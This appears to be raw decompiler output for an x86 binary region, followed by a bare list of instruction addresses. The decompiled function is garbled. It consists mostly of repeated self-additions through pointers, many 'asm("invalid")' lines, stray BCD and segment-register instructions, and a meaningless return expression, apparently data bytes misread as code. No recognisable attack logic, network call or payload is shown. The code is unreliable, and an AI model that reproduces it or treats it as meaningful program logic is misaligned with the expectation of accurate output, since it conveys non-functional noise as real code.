				 *((intOrPtr*)(_t312 + 0x2813)) =  *((intOrPtr*)(_t312 + 0x2813)) + _t405;
				 *_t312 =  *_t312 + _t312;
				 *_t312 =  *_t312 + _t312;
				 *_t312 =  *_t312 + _t312;
				 *_t312 =  *_t312 + _t312;
				 *_t312 =  *_t312 + _t312;
				 *((intOrPtr*)(_t312 + 0x18)) =  *((intOrPtr*)(_t312 + 0x18)) + _t405;
				_t313 = _t312 + 1;
				 *_t445 =  *_t445 + _t313;
				 *_t313 =  *_t313 + _t471;
				 *_t313 =  *_t313 + _t445;
				asm("daa");
				_t314 = _t313 + 1;
				 *_t314 =  *_t314 + _t314;
				 *_t314 =  *_t314 + _t314;
				_t406 = _t405 + _t405;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t314 =  *_t314 + 1;
				 *_t314 =  *_t314 + _t314;
				 *((intOrPtr*)(_t471 + _t503 + 0x40)) =  *((intOrPtr*)(_t471 + _t503 + 0x40)) + _t406;
				 *_t314 =  *_t314 + _t406;
				_t446 = _t445 + 1;
				 *_t314 =  *_t314 + _t314;
				 *_t314 =  *_t314 + _t314;
				_t315 = _t314 + _t446;
				asm("adc ch, [eax]");
				 *_t315 =  *_t315 + _t315;
				 *_t315 =  *_t315 + _t315;
				 *_t315 =  *_t315 + _t315;
				 *_t315 =  *_t315 + _t315;
				 *_t315 =  *_t315 + _t315;
				 *_t315 =  *_t315 + _t315;
				 *((intOrPtr*)(_t315 + 0x1004018)) =  *((intOrPtr*)(_t315 + 0x1004018)) + _t471;
				 *_t446 =  *_t446 + _t471;
				 *_t315 =  *_t315 + _t446;
				asm("daa");
				_t316 = _t315 + 1;
				 *_t316 =  *_t316 + _t316;
				 *_t316 =  *_t316 + _t316;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t316 =  *_t316 + 1;
				 *_t316 =  *_t316 + _t316;
				 *((intOrPtr*)(_t471 + _t503 + 0x51280040)) =  *((intOrPtr*)(_t471 + _t503 + 0x51280040)) + _t446;
				_t447 = _t446 + 1;
				 *_t316 =  *_t316 + _t316;
				 *_t316 =  *_t316 + _t316;
				 *((intOrPtr*)(_t316 + 0x13)) =  *((intOrPtr*)(_t316 + 0x13)) + _t447;
				 *_t316 =  *_t316 - _t316;
				 *_t316 =  *_t316 + _t316;
				 *_t316 =  *_t316 + _t316;
				 *_t316 =  *_t316 + _t316;
				 *_t316 =  *_t316 + _t316;
				 *_t316 =  *_t316 + _t316;
				 *_t316 =  *_t316 + _t316;
				asm("enter 0x4018, 0x0");
				 *_t316 =  *_t316 + _t316;
				asm("adc al, [eax]");
				 *_t480 =  *_t480 - _t316;
				_t317 = _t316 + 1;
				 *_t317 =  *_t317 + _t317;
				 *_t317 =  *_t317 + _t317;
				_t408 = _t406 + _t406 + _t406 + _t406;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t317 =  *_t317 + 1;
				 *_t317 =  *_t317 + _t317;
				_t319 = _t317 + _t408 -  *((intOrPtr*)(_t317 + _t408));
				 *_t319 =  *_t319 + _t319;
				 *_t319 =  *_t319 + _t319;
				_t320 = _t319 + _t408;
				asm("adc ch, [eax]");
				 *_t320 =  *_t320 + _t320;
				 *_t320 =  *_t320 + _t320;
				 *_t320 =  *_t320 + _t320;
				 *_t320 =  *_t320 + _t320;
				 *_t320 =  *_t320 + _t320;
				 *_t320 =  *_t320 + _t320;
				 *_t320 =  *_t320 + _t320;
				asm("sbb [eax], eax");
				 *_t320 =  *_t320 + _t320;
				asm("adc eax, [eax]");
				 *_t480 =  *_t480 - _t320;
				_t321 = _t320 + 1;
				 *_t321 =  *_t321 + _t321;
				 *_t321 =  *_t321 + _t321;
				_t409 = _t408 + _t408;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t321 =  *_t321 + 1;
				 *_t321 =  *_t321 + _t321;
				 *((intOrPtr*)(_t409 + _t503)) =  *((intOrPtr*)(_t409 + _t503)) + _t447;
				_t322 = _t321 + 1;
				 *((intOrPtr*)(_t322 + 0x51)) =  *((intOrPtr*)(_t322 + 0x51)) + _t447;
				_t448 = _t447 + 1;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				_t323 = _t322 + _t448;
				asm("adc ch, [eax]");
				 *_t323 =  *_t323 + _t323;
				 *_t323 =  *_t323 + _t323;
				 *_t323 =  *_t323 + _t323;
				 *_t323 =  *_t323 + _t323;
				 *_t323 =  *_t323 + _t323;
				 *_t323 =  *_t323 + _t323;
				 *_t323 =  *_t323 + _t409;
				asm("sbb [eax], eax");
				 *_t323 =  *_t323 + _t323;
				asm("adc al, 0x0");
				 *_t480 =  *_t480 - _t323;
				_t324 = _t323 + 1;
				 *_t324 =  *_t324 + _t324;
				 *_t324 =  *_t324 + _t324;
				_t410 = _t409 + _t409;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t324 =  *_t324 + 1;
				 *_t324 =  *_t324 + _t324;
				 *((intOrPtr*)(_t410 + _t503)) =  *((intOrPtr*)(_t410 + _t503)) + _t410;
				_t325 = _t324 + 1;
				 *((intOrPtr*)(_t325 + 0x51)) =  *((intOrPtr*)(_t325 + 0x51)) + _t410;
				_t449 = _t448 + 1;
				 *_t325 =  *_t325 + _t325;
				 *_t325 =  *_t325 + _t325;
				 *((intOrPtr*)(_t325 + 0x2812)) =  *((intOrPtr*)(_t325 + 0x2812)) + _t449;
				 *_t325 =  *_t325 + _t325;
				 *_t325 =  *_t325 + _t325;
				 *_t325 =  *_t325 + _t325;
				 *_t325 =  *_t325 + _t325;
				 *_t325 =  *_t325 + _t325;
				 *((intOrPtr*)(_t325 + 0x19)) =  *((intOrPtr*)(_t325 + 0x19)) + _t471;
				_t326 = _t325 + 1;
				 *_t449 =  *_t449 + _t326;
				 *0x40272800 =  *0x40272800 + _t471;
				 *_t326 =  *_t326 + _t326;
				 *_t326 =  *_t326 + _t326;
				_t411 = _t410 + _t410;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t326 =  *_t326 + 1;
				 *_t326 =  *_t326 + _t326;
				 *((intOrPtr*)(_t411 + _t503 + 0x40)) =  *((intOrPtr*)(_t411 + _t503 + 0x40)) + _t449;
				 *((intOrPtr*)(_t326 + 0x51)) =  *((intOrPtr*)(_t326 + 0x51)) + _t449;
				_t450 = _t449 + 1;
				 *_t326 =  *_t326 + _t326;
				 *_t326 =  *_t326 + _t326;
				 *_t326 =  *_t326 + _t450;
				asm("adc al, 0x28");
				 *_t326 =  *_t326 + _t326;
				 *_t326 =  *_t326 + _t326;
				 *_t326 =  *_t326 + _t326;
				 *_t326 =  *_t326 + _t326;
				 *_t326 =  *_t326 + _t326;
				 *_t326 =  *_t326 + _t326;
				 *((intOrPtr*)(_t326 + 0x1004019)) =  *((intOrPtr*)(_t326 + 0x1004019)) + _t450;
				 *_t488 =  *_t488 + _t471;
				 *_t326 =  *_t326 + _t450;
				asm("daa");
				_t327 = _t326 + 1;
				 *_t327 =  *_t327 + _t327;
				 *_t327 =  *_t327 + _t327;
				_t412 = _t411 + _t411;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t327 =  *_t327 + 1;
				 *_t327 =  *_t327 + _t327;
				 *((intOrPtr*)(_t412 + _t503 + 0x51780040)) =  *((intOrPtr*)(_t412 + _t503 + 0x51780040)) + _t412;
				_t451 = _t450 + 1;
				 *_t327 =  *_t327 + _t327;
				 *_t327 =  *_t327 + _t327;
				 *_t327 =  *_t327 + _t412;
				asm("adc ebp, [eax]");
				 *_t327 =  *_t327 + _t327;
				 *_t327 =  *_t327 + _t327;
				 *_t327 =  *_t327 + _t327;
				 *_t327 =  *_t327 + _t327;
				 *_t327 =  *_t327 + _t327;
				 *_t327 =  *_t327 + _t327;
				_t328 = _t327 + _t327;
				asm("sbb [eax], eax");
				 *_t328 =  *_t328 + _t328;
				ss = _t445;
				 *_t328 =  *_t328 + _t451;
				asm("daa");
				_t329 = _t328 + 1;
				 *_t329 =  *_t329 + _t329;
				 *_t329 =  *_t329 + _t329;
				_t413 = _t412 + _t412;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t329 =  *_t329 + 1;
				 *_t329 =  *_t329 + _t329;
				_t331 = _t329 + _t451 -  *((intOrPtr*)(_t329 + _t451));
				 *(_t451 + 0x41) = _t471;
				 *_t331 =  *_t331 + _t331;
				 *_t331 =  *_t331 + _t331;
				 *((intOrPtr*)(_t331 + 0x13)) =  *((intOrPtr*)(_t331 + 0x13)) + _t413;
				 *_t331 =  *_t331 - _t331;
				 *_t331 =  *_t331 + _t331;
				 *_t331 =  *_t331 + _t331;
				 *_t331 =  *_t331 + _t331;
				 *_t331 =  *_t331 + _t331;
				 *_t331 =  *_t331 + _t331;
				 *_t331 =  *_t331 + _t331;
				asm("sbb [edx], bl");
				_t332 = _t331 + 1;
				 *_t451 =  *_t451 + _t332;
				 *_t332 =  *_t332 + _t413;
				 *_t332 =  *_t332 + _t451;
				asm("daa");
				_t333 = _t332 + 1;
				 *_t333 =  *_t333 + _t333;
				 *_t333 =  *_t333 + _t333;
				_t414 = _t413 + _t413;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t333 =  *_t333 + 1;
				 *_t333 =  *_t333 + _t333;
				_t336 = _t333 + _t414 -  *((intOrPtr*)(_t333 + _t414));
				_t452 = _t451 + 1;
				 *_t336 =  *_t336 + _t336;
				 *_t336 =  *_t336 + _t336;
				 *((intOrPtr*)(_t336 + 0x12)) =  *((intOrPtr*)(_t336 + 0x12)) + _t452;
				 *_t336 =  *_t336 - _t336;
				 *_t336 =  *_t336 + _t336;
				 *_t336 =  *_t336 + _t336;
				 *_t336 =  *_t336 + _t336;
				 *_t336 =  *_t336 + _t336;
				 *_t336 =  *_t336 + _t336;
				 *_t336 =  *_t336 + _t336;
				asm("sbb al, [eax]");
				 *_t336 =  *_t336 + _t336;
				asm("sbb [eax], eax");
				 *_t480 =  *_t480 - _t336;
				_t337 = _t336 + 1;
				 *_t337 =  *_t337 + _t337;
				 *_t337 =  *_t337 + _t337;
				_t415 = _t414 + _t414;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t337 =  *_t337 + 1;
				 *_t337 =  *_t337 + _t337;
				 *((intOrPtr*)(_t509 + _t503)) =  *((intOrPtr*)(_t509 + _t503)) + _t452;
				_t338 = _t337 + 1;
				 *((intOrPtr*)(_t338 + 0x4151)) =  *((intOrPtr*)(_t338 + 0x4151)) + _t452;
				 *_t338 =  *_t338 + _t338;
				 *((intOrPtr*)(_t338 + 0x13)) =  *((intOrPtr*)(_t338 + 0x13)) + _t452;
				 *_t338 =  *_t338 - _t338;
				 *_t338 =  *_t338 + _t338;
				 *_t338 =  *_t338 + _t338;
				 *_t338 =  *_t338 + _t338;
				 *_t338 =  *_t338 + _t338;
				 *_t338 =  *_t338 + _t338;
				 *_t338 =  *_t338 + _t338;
				 *_t471 = _t415;
				_t339 = _t338 + 1;
				 *_t452 =  *_t452 + _t339;
				 *0x40272800 =  *0x40272800 + _t339;
				 *_t339 =  *_t339 + _t339;
				 *_t339 =  *_t339 + _t339;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t339 =  *_t339 + 1;
				 *_t339 =  *_t339 + _t339;
				 *((intOrPtr*)(_t488 + _t503 + 0x40)) =  *((intOrPtr*)(_t488 + _t503 + 0x40)) + _t452;
				 *((intOrPtr*)(_t339 + 0x52)) =  *((intOrPtr*)(_t339 + 0x52)) + _t452;
				_t453 = _t452 + 1;
				 *_t339 =  *_t339 + _t339;
				 *_t339 =  *_t339 + _t339;
				 *_t339 =  *_t339 + _t415 + _t415;
				_t417 = _t336;
				asm("daa");
				 *_t339 =  *_t339 + _t339;
				 *_t339 =  *_t339 + _t339;
				 *_t339 =  *_t339 + _t339;
				 *_t339 =  *_t339 + _t339;
				 *_t339 =  *_t339 + _t339;
				 *_t339 =  *_t339 + _t339;
				_t340 = _t339 + _t339;
				asm("sbb al, [eax]");
				 *_t340 =  *_t340 + _t340;
				asm("sbb eax, [eax]");
				 *_t480 =  *_t480 - _t340;
				_t341 = _t340 + 1;
				 *_t341 =  *_t341 + _t341;
				 *_t341 =  *_t341 + _t341;
				_t418 = _t417 + _t417;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t341 =  *_t341 + 1;
				 *_t341 =  *_t341 + _t341;
				 *((intOrPtr*)(_t509 + _t503 + 0x51c80040)) =  *((intOrPtr*)(_t509 + _t503 + 0x51c80040)) + _t453;
				_t454 = _t453 + 1;
				 *_t341 =  *_t341 + _t341;
				 *_t341 =  *_t341 + _t341;
				_t342 = _t341 + _t454;
				asm("adc ebp, [eax]");
				 *_t342 =  *_t342 + _t342;
				 *_t342 =  *_t342 + _t342;
				 *_t342 =  *_t342 + _t342;
				 *_t342 =  *_t342 + _t342;
				 *_t342 =  *_t342 + _t342;
				 *_t342 =  *_t342 + _t342;
				_t343 = _t342 + _t418;
				asm("sbb al, [eax]");
				 *_t343 =  *_t343 + _t343;
				_t344 = _t343 &  *_t343;
				 *_t480 =  *_t480 - _t344;
				_t345 = _t344 + 1;
				 *_t345 =  *_t345 + _t345;
				 *_t345 =  *_t345 + _t345;
				_t419 = _t418 + _t418;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t345 =  *_t345 + 1;
				 *_t345 =  *_t345 + _t345;
				_t347 = _t345 + _t419 - 0x52380040;
				_t455 = _t454 + 1;
				 *_t347 =  *_t347 + _t347;
				 *_t347 =  *_t347 + _t347;
				 *((intOrPtr*)(_t347 + 0x275d)) =  *((intOrPtr*)(_t347 + 0x275d)) + _t455;
				 *_t347 =  *_t347 + _t347;
				 *_t347 =  *_t347 + _t347;
				 *_t347 =  *_t347 + _t347;
				 *_t347 =  *_t347 + _t347;
				 *_t347 =  *_t347 + _t347;
				 *_t347 =  *_t347 + _t471;
				asm("sbb eax, [eax]");
				 *_t347 =  *_t347 + _t347;
				_t348 = _t347 &  *_t347;
				 *_t480 =  *_t480 - _t348;
				_t349 = _t348 + 1;
				 *_t349 =  *_t349 + _t349;
				 *_t349 =  *_t349 + _t349;
				_t420 = _t419 + _t419;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t349 =  *_t349 + 1;
				 *_t349 =  *_t349 + _t349;
				 *((intOrPtr*)(_t488 + _t503)) =  *((intOrPtr*)(_t488 + _t503)) + _t455;
				_t350 = _t349 + 1;
				 *((intOrPtr*)(_t350 + 0x52)) =  *((intOrPtr*)(_t350 + 0x52)) + _t455;
				_t456 = _t455 + 1;
				 *_t350 =  *_t350 + _t350;
				 *_t350 =  *_t350 + _t350;
				 *((intOrPtr*)(_t350 + 0x5b)) =  *((intOrPtr*)(_t350 + 0x5b)) + _t456;
				asm("daa");
				 *_t350 =  *_t350 + _t350;
				 *_t350 =  *_t350 + _t350;
				 *_t350 =  *_t350 + _t350;
				 *_t350 =  *_t350 + _t350;
				 *_t350 =  *_t350 + _t350;
				 *_t350 =  *_t350 + _t350;
				 *((intOrPtr*)(_t350 + 0x1b)) =  *((intOrPtr*)(_t350 + 0x1b)) + _t456;
				_t351 = _t350 + 1;
				 *_t456 =  *_t456 + _t351;
				 *_t488 =  *_t488 + _t420;
				 *_t351 =  *_t351 + _t456;
				asm("daa");
				_t352 = _t351 + 1;
				 *_t352 =  *_t352 + _t352;
				 *_t352 =  *_t352 + _t352;
				_t421 = _t420 + _t420;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t352 =  *_t352 + 1;
				 *_t352 =  *_t352 + _t352;
				 *((intOrPtr*)(_t503 + 0x51f80040)) =  *((intOrPtr*)(_t503 + 0x51f80040)) + _t421;
				_t457 = _t456 + 1;
				 *_t352 =  *_t352 + _t352;
				 *_t352 =  *_t352 + _t352;
				_t353 = _t352 + _t421;
				_t510 = _t451;
				asm("daa");
				 *_t353 =  *_t353 + _t353;
				 *_t353 =  *_t353 + _t353;
				 *_t353 =  *_t353 + _t353;
				 *_t353 =  *_t353 + _t353;
				 *_t353 =  *_t353 + _t353;
				 *_t353 =  *_t353 + _t353;
				 *((intOrPtr*)(_t353 + 0x100401b)) =  *((intOrPtr*)(_t353 + 0x100401b)) + _t353;
				 *_t480 =  *_t480 + _t421;
				 *_t353 =  *_t353 + _t457;
				asm("daa");
				_t354 = _t353 + 1;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				_t422 = _t421 + _t421;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t354 =  *_t354 + 1;
				 *_t354 =  *_t354 + _t354;
				 *((intOrPtr*)(_t503 + _t503 + 0x40)) =  *((intOrPtr*)(_t503 + _t503 + 0x40)) + _t457;
				 *_t354 =  *_t354 + _t457;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *((intOrPtr*)(_t354 + 0x275c)) =  *((intOrPtr*)(_t354 + 0x275c)) + _t422;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				_t355 = _t354 + _t422;
				asm("sbb eax, [eax]");
				 *_t355 =  *_t355 + _t355;
				 *_t355 =  *_t355 & _t355;
				 *_t480 =  *_t480 - _t355;
				_t356 = _t355 + 1;
				 *_t356 =  *_t356 + _t356;
				 *_t356 =  *_t356 + _t356;
				_t423 = _t422 + _t422;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t356 =  *_t356 + 1;
				 *_t356 =  *_t356 + _t356;
				 *((intOrPtr*)(_t503 + _t503 + 0x40)) =  *((intOrPtr*)(_t503 + _t503 + 0x40)) + _t423;
				 *_t356 =  *_t356 + _t423;
				_t459 = _t457 + 2;
				 *_t356 =  *_t356 + _t356;
				 *_t356 =  *_t356 + _t356;
				 *((intOrPtr*)(_t356 + 0x5d)) =  *((intOrPtr*)(_t356 + 0x5d)) + _t459;
				asm("daa");
				 *_t356 =  *_t356 + _t356;
				 *_t356 =  *_t356 + _t356;
				 *_t356 =  *_t356 + _t356;
				 *_t356 =  *_t356 + _t356;
				 *_t356 =  *_t356 + _t356;
				 *_t356 =  *_t356 + _t356;
				 *_t356 =  *_t356 + _t471;
				asm("sbb al, 0x40");
				 *_t459 =  *_t459 + _t356;
				 *_t459 =  *_t459 + _t356;
				 *_t356 =  *_t356 + _t459;
				asm("daa");
				_t357 = _t356 + 1;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				_t424 = _t423 + _t423;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t357 =  *_t357 + 1;
				 *_t357 =  *_t357 + _t357;
				 *((intOrPtr*)(_t503 + _t503 + 0x52280040)) =  *((intOrPtr*)(_t503 + _t503 + 0x52280040)) + _t459;
				_t460 = _t459 + 1;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t424;
				_t489 = _t471;
				asm("daa");
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *((intOrPtr*)(_t357 + 0x1c)) =  *((intOrPtr*)(_t357 + 0x1c)) + _t460;
				_t358 = _t357 + 1;
				 *_t460 =  *_t460 + _t358;
				 *((intOrPtr*)(_t358 + _t358)) =  *((intOrPtr*)(_t358 + _t358)) + _t358;
				 *_t480 =  *_t480 - _t358;
				_t359 = _t358 + 1;
				 *_t359 =  *_t359 + _t359;
				 *_t359 =  *_t359 + _t359;
				_t425 = _t424 + _t424;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t359 =  *_t359 + 1;
				 *_t359 =  *_t359 + _t359;
				 *((intOrPtr*)(_t489 + _t503)) =  *((intOrPtr*)(_t489 + _t503)) + _t425;
				_t360 = _t359 + 1;
				 *((intOrPtr*)(_t360 + 0x52)) =  *((intOrPtr*)(_t360 + 0x52)) + _t425;
				_t461 = _t460 + 1;
				 *_t360 =  *_t360 + _t360;
				 *_t360 =  *_t360 + _t360;
				 *((intOrPtr*)(_t360 + 0x275a)) =  *((intOrPtr*)(_t360 + 0x275a)) + _t425;
				 *_t360 =  *_t360 + _t360;
				 *_t360 =  *_t360 + _t360;
				 *_t360 =  *_t360 + _t360;
				 *_t360 =  *_t360 + _t360;
				 *_t360 =  *_t360 + _t360;
				 *((intOrPtr*)(_t360 + 0x100401c)) =  *((intOrPtr*)(_t360 + 0x100401c)) + _t360;
				 *_t471 =  *_t471 + _t360;
				 *_t360 =  *_t360 + _t461;
				asm("daa");
				_t361 = _t360 + 1;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				_t426 = _t425 + _t425;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t361 =  *_t361 + 1;
				 *_t361 =  *_t361 + _t361;
				_t362 = _t361 + _t426;
				asm("daa");
				_t363 = _t362 + 1;
				 *_t363 =  *_t363 + _t471;
				_t462 = _t461 + 1;
				 *_t471 =  *_t471 + _t462;
				 *_t363 =  *_t363 + _t363;
				 *((intOrPtr*)(_t363 + 0x401c)) =  *((intOrPtr*)(_t363 + 0x401c)) + _t426;
				 *_t363 =  *_t363 + _t363;
				 *_t363 =  *_t363 + _t363;
				 *_t363 =  *_t363 + _t363;
				 *_t363 =  *_t363 + _t363;
				 *_t363 =  *_t363 + _t363;
				 *((intOrPtr*)(_t363 + 0x401c)) =  *((intOrPtr*)(_t363 + 0x401c)) + _t426;
				 *_t363 =  *_t363 + _t363;
				 *_t363 =  *_t363 + _t363;
				 *_t363 =  *_t363 + _t363;
				 *_t363 =  *_t363 + _t363;
				 *_t363 =  *_t363 + _t363;
				 *_t363 =  *_t363 + _t363;
				 *_t363 =  *_t363 + _t363;
				 *_t363 =  *_t363 + _t363;
				 *_t363 =  *_t363 + _t363;
				 *_t363 =  *_t363 + _t363;
				 *_t363 =  *_t363 + _t363;
				 *_t363 =  *_t363 + _t363;
				 *_t363 =  *_t363 + _t363;
				 *_t363 =  *_t363 + _t363;
				 *_t363 =  *_t363 + _t363;
				 *_t363 =  *_t363 + _t363;
				 *_t363 =  *_t363 + _t363;
				 *_t363 =  *_t363 + _t363;
				 *_t363 =  *_t363 + _t363;
				 *_t480 =  *_t480 + _t363;
				 *_t363 =  *_t363 + _t363;
				 *((intOrPtr*)( &(_t480[0x1c010]) + _t471)) =  *((intOrPtr*)( &(_t480[0x1c010]) + _t471)) + _t471;
				 *_t363 =  *_t363 + _t363;
				es = _t363;
				 *_t363 =  *_t363 + _t363;
				 *((intOrPtr*)(_t480 + _t471)) =  *((intOrPtr*)(_t480 + _t471)) + _t426;
				_t364 = _t363 + 1;
				 *_t480 =  *_t480 + _t364;
				 *_t364 =  *_t364 + _t364;
				_t365 = _t364 + _t471;
				es = _t363;
				 *_t365 =  *_t365 + _t365;
				 *((intOrPtr*)(_t462 +  &(_t480[0x1c010]))) =  *((intOrPtr*)(_t462 +  &(_t480[0x1c010]))) + _t365;
				 *_t365 =  *_t365 + _t365;
				_t366 = _t365 + 1;
				es = _t471;
				 *_t366 =  *_t366 + _t366;
				_t367 = _t366 + _t462;
				es = _t444;
				 *_t367 =  *_t367 + _t367;
				 *((intOrPtr*)(_t367 +  &(_t480[0x1c010]))) =  *((intOrPtr*)(_t367 +  &(_t480[0x1c010]))) + _t367;
				 *_t367 =  *_t367 + _t367;
				asm("sbb al, 0x38");
				_t368 = _t367 + 1;
				 *_t480 =  *_t480 + _t368;
				 *_t368 =  *_t368 + _t368;
				asm("aaa");
				_t370 = _t368 + _t471 + 1;
				 *_t489 =  *_t489 + _t370;
				 *_t370 =  *_t370 + _t370;
				 *((intOrPtr*)(_t489 + _t489 + 0x40)) =  *((intOrPtr*)(_t489 + _t489 + 0x40)) + _t370;
				 *_t480 =  *_t480 + _t370;
				 *_t370 =  *_t370 + _t370;
				 *((intOrPtr*)(_t510 + _t489 + 0x40)) =  *((intOrPtr*)(_t510 + _t489 + 0x40)) + _t471;
				 *_t480 =  *_t480 + _t370;
				 *_t370 =  *_t370 + _t370;
				_t372 = _t370 + _t462 ^  *(_t370 + _t462);
				es = _t311;
				 *_t372 =  *_t372 + _t372;
				 *((intOrPtr*)(_t426 + _t489 + 0x70040)) =  *((intOrPtr*)(_t426 + _t489 + 0x70040)) + _t471;
				 *_t372 =  *_t372 + _t372;
				_t373 = _t372 ^  *_t372;
				es = _t372;
				 *_t373 =  *_t373 + _t373;
				_t375 = _t373 + _t426 ^  *(_t373 + _t426);
				_pop(es);
				 *_t375 =  *_t375 + _t375;
				 *((intOrPtr*)(_t375 + 0x7004032)) =  *((intOrPtr*)(_t375 + 0x7004032)) + _t471;
				 *_t375 =  *_t375 + _t375;
				 *((intOrPtr*)(_t471 + _t489 + 0x40)) =  *((intOrPtr*)(_t471 + _t489 + 0x40)) + _t471;
				 *_t375 =  *_t375 + _t471;
				 *_t375 =  *_t375 + _t375;
				asm("adc eax, 0x84fe4181");
				return _t375 - 0xc0043f12 | 0x01bd4fc1;
			}

0x004012f0
0x004012f0
0x004012f0
0x004012f0
0x004012f5
0x004012fa
0x004012fc
0x004012fe
0x00401300
0x00401302
0x00401304
0x00401305
0x00401307
0x00401309
0x0040130b
0x0040130c
0x00401312
0x00401313
0x00401314
0x00401316
0x0040131a
0x0040131c
0x0040131e
0x00401320
0x00401322
0x00401324
0x00401326
0x00401328
0x0040132a
0x0040132c
0x00401333
0x00401334
0x00401335
0x00401337
0x00401338
0x0040133a
0x0040133c
0x0040133e
0x00401340
0x00401342
0x00401344
0x00401349
0x00401350
0x00401357
0x00401359
0x00401362
0x00401369
0x0040136a
0x0040136c
0x0040136c
0x0040136f
0x00401375
0x00401377
0x00401379
0x0040137b
0x0040137d
0x0040137f
0x00401381
0x00401383
0x00401385
0x00401387
0x00401389
0x0040138b
0x0040138d
0x0040138f
0x00401391
0x00401393
0x00401395
0x00401397
0x00401399
0x0040139a
0x0040139c
0x0040139f
0x004013a1
0x004013a8
0x004013a9
0x004013aa
0x004013ab
0x004013ae
0x004013af
0x004013b0
0x004013b1
0x004013b3
0x004013b7
0x004013b8
0x004013b9
0x004013c3
0x004013c4
0x004013c5
0x004013c7
0x004013c9
0x004013ca
0x004013cc
0x004013ce
0x004013cf
0x004013d1
0x004013d4
0x004013da
0x004013db
0x004013dc
0x004013de
0x004013df
0x004013e0
0x004013e1
0x004013e7
0x004013ea
0x004013f0
0x004013f3
0x004013f4
0x004013f7
0x004013f9
0x004013fc
0x004013fe
0x00401403
0x00401436
0x00401436
0x00401436
0x0040143b
0x0040143d
0x00000000
0x0040143f
0x0040143f
0x00401440
0x00401443
0x00000000
0x00401445
0x00401445
0x00401448
0x0040144a
0x0040144c
0x0040144e
0x00401450
0x00401452
0x00401454
0x00401456
0x00401458
0x0040145b
0x0040145c
0x0040145d
0x00000000
0x0040145d
0x00401448
0x00401443
0x00401405
0x00401405
0x00401407
0x0040140b
0x0040140e
0x00401411
0x00401412
0x00401412
0x00401415
0x0040147f
0x0040147f
0x00401481
0x00401483
0x00401486
0x0040148a
0x00401490
0x00401491
0x00401496
0x0040149d
0x004014a3
0x004014a4
0x004014a8
0x004014a8
0x004014aa
0x004014ab
0x004014ab
0x004014ad
0x004014b3
0x004014b4
0x004014b7
0x00401417
0x00401417
0x0040141b
0x0040141d
0x0040141f
0x00401421
0x00401423
0x00401425
0x0040142a
0x0040145e
0x0040145e
0x00401460
0x00401462
0x00401464
0x00401468
0x00401469
0x0040146a
0x0040146d
0x0040146e
0x00401474
0x00401475
0x0040147a
0x0040147c
0x00000000
0x0040142c
0x0040142c
0x00401430
0x00401431
0x00401432
0x00401434
0x00000000
0x00401434
0x0040142a
0x00401415
0x004014b8
0x004014c1
0x004014cb
0x004014ce
0x004014cf
0x004014d0
0x004014d1
0x004014d5
0x004014d7
0x004014d9
0x004014db
0x004014dd
0x004014de
0x004014df
0x004014e1
0x004014e3
0x004014e5
0x004014e7
0x004014e9
0x004014eb
0x004014ed
0x004014ef
0x004014f3
0x004014f9
0x004014fb
0x004014fe
0x00401500
0x00401502
0x00401504
0x00401506
0x00401508
0x0040150a
0x0040150c
0x00401512
0x00401514
0x00401516
0x00401517
0x00401519
0x0040151b
0x0040151d
0x0040151f
0x00401521
0x00401523
0x00401525
0x00401527
0x0040152e
0x0040152f
0x00401531
0x00401533
0x00401535
0x00401536
0x00401537
0x00401539
0x0040153b
0x0040153d
0x0040153f
0x00401541
0x00401543
0x00401546
0x00401547
0x00401549
0x0040154f
0x00401551
0x00401553
0x00401555
0x00401557
0x00401559
0x0040155b
0x0040155d
0x00401563
0x00401565
0x00401566
0x00401567
0x00401569
0x0040156b
0x0040156e
0x0040156f
0x00401571
0x00401573
0x00401575
0x00401577
0x00401579
0x0040157b
0x00401581
0x00401583
0x00401585
0x00401586
0x00401587
0x00401589
0x0040158b
0x0040158d
0x0040158f
0x00401591
0x00401593
0x00401595
0x00401597
0x0040159a
0x0040159b
0x0040159f
0x004015a1
0x004015a3
0x004015a9
0x004015ab
0x004015ad
0x004015af
0x004015b1
0x004015b3
0x004015b9
0x004015bc
0x004015be
0x004015bf
0x004015c1
0x004015c3
0x004015c5
0x004015c7
0x004015c9
0x004015cb
0x004015cd
0x004015cf
0x004015d2
0x004015d3
0x004015d6
0x004015d7
0x004015d9
0x004015db
0x004015e1
0x004015e3
0x004015e5
0x004015e7
0x004015e9
0x004015ed
0x004015f2
0x004015f7
0x004015f9
0x004015fb
0x004015fd
0x004015ff
0x00401601
0x00401603
0x00401605
0x00401607
0x0040160b
0x0040160e
0x0040160f
0x00401611
